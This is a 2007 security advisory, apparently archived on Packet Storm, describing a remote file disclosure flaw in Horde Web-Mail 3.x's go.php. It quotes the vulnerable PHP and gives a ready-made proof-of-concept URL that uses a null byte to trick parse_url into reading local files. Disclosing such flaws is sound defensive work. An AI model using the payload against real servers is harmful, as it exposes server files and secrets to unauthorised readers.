Horde Web-Mail version 3.x suffers from a remote file disclosure vulnerability in go.php.
2af5b66510b9ad89df302b4d65b0b04f535bebd8aea0b096010f8cbac5011e6c----[ Horde Web-Mail Remote File Disclosure ... ITDefence.ru Antichat.ru ]
Horde Web-Mail Remote File Disclosure
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
At first look , this code is not vulnerable and we can only read remote files.
<?php
if (empty($_GET['url'])) {
exit;
}
if (get_magic_quotes_gpc()) {
$url = @parse_url(stripslashes($_GET['url']));
} else {
$url = @parse_url($_GET['url']);
}
.....
if ((!empty($_SERVER['SERVER_NAME']) &&
$_SERVER['SERVER_NAME'] == $url['host']) ||
(!empty($_SERVER['HTTP_HOST']) &&
$_SERVER['HTTP_HOST'] == $url['host'])) {
.....
if (!empty($_GET['untrusted'])) {
readfile($_GET['url']);
exit;
}
?>
But parse_url is only a set of regular expressions and we can use nullbyte to deceive function.
http://test1.ru/horde/util/go.php?untrusted=1&url=test.php%00http://another.host/
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed